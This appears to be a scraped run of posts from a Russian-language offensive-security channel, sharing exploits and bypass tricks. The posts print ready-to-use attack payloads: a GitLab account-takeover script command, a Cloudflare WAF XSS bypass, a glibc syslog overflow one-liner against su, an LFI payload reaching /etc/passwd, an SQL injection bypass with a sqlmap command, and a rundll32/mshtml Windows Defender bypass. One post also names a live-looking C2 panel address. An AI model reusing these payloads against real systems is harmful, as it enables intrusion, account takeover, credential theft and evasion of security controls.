CVE-2023-7028 | Account-Take-Over Gitlab
*
usage:
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t my.target@example.com

#gitlab

Linux Privileges Escalation Techniques (Basic to Advanced) Series
*
Part 1: http://hacklido.com/blog/158
Part 2: http://hacklido.com/blog/162
Part 3: http://hacklido.com/blog/210
Part 4: http://hacklido.com/blog/224
Part 5: https://hacklido.com/blog/286

CVE-2023-35636 Microsoft Outlook, связанная с раскрытием информации (утечка хеша пароля) — Expect Script POC
*
exploit

#outlook

ARTToolkit
*
Интерактивная шпаргалка, содержащая полезный список наступательных инструментов безопасности и соответствующих им команд/полезных данных, которые можно использовать в redteam
*
Link

Наконец то была найдена Атлантида
На легендарный остров-государство обманным путем вывозят Telegram, Steam, данные криптовалютных кошельков, данные браузера, а также пушнину и женщин
РенТВ - call me
http://5.42.64.32/login.php C2 Panel

#cc #bot

Рекомендуется к прочтению
Интервью с yashechka
Мои поздравления )))
*
#xman_series

LockBit 3.0 - ребят, напишите мне, я вам расскажу за репутационный риск менеджмент
есть пара мыслей

#lockbit

Linux Kernel Exploitation (свежая версия)
*
1 часть - Getting started & BOF
2 часть - Exploiting race-condition + UAF
3 часть - Heap techniques

#linux #kernel #hack

bypass XSS Cloudflare WAF

Encoded Payload
"><track/onerror='confirm\%601\%60'>

Clean Payload
"><track/onerror='confirm`1`'>

#CF #bypass

Docker 4 сыра дырки
writeup тут
а на видео видно как можно заюзать дырку в docker runc

#docker #escape

CVE-2023-6246:
Heap-based buffer overflow in the glibc's syslog

POC
(exec -a "`printf '%0128000x' 1`" /usr/bin/su < /dev/null)

всем сегфолта )))))

Lenovo X1 Carbon Bitlocker Key Sniffing
круто, 42.9 секунды

Утры, как сами? Кофе, ? Давай два?)))

x4n4x security
тема
ты молодец ))))

внесем немного конкретики о пинах
BitLocker Key retrieval on a Windows 11, Lenovo X1 Carbon Gen 11 via SPI Sniffing.
То есть на задней стороне материнки, есть тестовые пады, секурненько )))
*
Да, это TPM 2.0
*
Ну и почитать TPM SNIFFING
#bitlocker #sniff

LFI
*
Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

Pwning the Domain: Credentialess/Username
*
Большой и подробный ман от 7 февраля 2024
*
read

#redteam #win #pwn #cred

В поисках malware инфраструктуры
*
Если вам интересно как ищут всякие opedir, или C&C со всякими cobalt-strike, havoc или малварь вроде dark comet, то есть интересная статья, в статье 11 примеров на базе censys.
*
Исходя из статьи, можно немного прикрыть свой C2 от любопытных глаз
*
Tracking Malware Infrastructure

#malware #c2

Xbox ? PlayStation ?
No
Ubiquiti switch !

Bypassing SQL
*
payload:
8%20or%207250%3d0725
*
для sqlmap:
sqlmap -u 'http://OLOLO.com/anyfile.asp?id_test=8%20or%207250%3d07250' --dbs --random-agent ignore=500 - -code=200 -T tablename --columns -- no-cast
*

#sql #bypass

Windows Defender Detection Mitigation Bypass Vulnerability
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass.
*
то есть было и пофиксили:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,RunHTMLApplication ";alert(666)
магия запятой:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)
собака старая, трюки новые.
CVE пока не имеет )

#defender #bypass